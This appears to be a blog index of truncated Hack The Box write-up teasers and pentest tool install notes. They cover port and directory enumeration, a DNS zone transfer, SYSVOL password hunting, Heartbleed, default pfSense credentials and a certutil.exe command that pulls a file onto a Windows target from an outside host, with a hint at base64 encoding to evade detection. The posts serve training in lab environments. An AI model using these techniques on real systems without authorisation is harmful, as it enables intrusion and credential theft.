HTB OpenAdmin

Enumeration $ nmap -A -T4 -p- $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e Access to Access to There is a login link. Click and you’ll be redirected to Based on this screenshot, we have an OpenNetAdmin (v18.1.1) Access to Access to Vulnerability analysis $ searchsploit opennetadmin $ searchsploit -x 47691 The -d option in Curl means data. -d, –data: (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p- $ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u Access to Acess to We discovered that SSL cert is using a common name as (it is a vhost).So we can access then to (after this host was added to the /etc/host file) We can do a zone transfer for that domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p- Open ports detected:• 21/tcp open ftp Microsoft ftpd• 23/tcp open telnet?• 80/tcp open http Microsoft IIS httpd 7.5 $ ftp ftp> dir ftp> cd Backupsftp> dir ftp> get backup.mdb ftp> cd ..ftp> dir ftp> cd Engineerftp> dir ftp> get «Access» Files haven’t been correctly downloaded.By default, ftp mode set for text files.We need to download again this files but this time using

Impacket installation

Impacket is a collection of Python classes for working with network protocols. Installation process: Download last release. Extract the file. Install the requirements. Install the package. $ pip install -r requirements.txt If we have an error installing wheel package, we can do it individually. $ pip install wheel Now run the configuration script. $ python bdist_wheel Let’s try to install the requirements again: $ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from The trick is based on a base64 encoding file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. Run installation script $ python3 -m pip install git+ Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

HTB Active

$ sudo nmap -A -T4 -p- Let’s enumerate SMB resources using SMBMap. $ smbmap -H $ smbclient // smb: > dir This share seems to be a copy of the SYSVOL’s. According to the information found in: Finding Passwords in SYSVOL & Exploiting Group Policy Preferences Attack Methods for Gaining Domain Admin Rights in Active Directory We need to find a file as groups.xml, scheduledtasks.xml and Services.xml where

HTB Sense

$ nmap -A -T4 -p- sense.htb $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e We need to skip SSL certificate verification using -k option. $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt We’ve found 2 text documents. changelog.txt system-users.txt Company defaults?As we have a PfSense site, we can try with default Pfsense password (pfsense) Access to This

HTB Valentine

$ sudo nmap -T4 -A -p- $ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k $ nikto -h $ sudo nmap –script vuln -p 80 $ sudo nmap –script vuln -p 443 Based on these results, this box is Heartbleed vulnerable. $ python $ strings dump.bin Using aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==heartbleedbelievethehype Access to This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb We just have an Apache on port 80 and OpenSSH on port 2222. Access to http://shocker.htb ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e We have a cgi-bin folder that may contain script files. Let’s use again Gobuster but this time searching files by file type.(.sh,.py) $ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh Based on the box name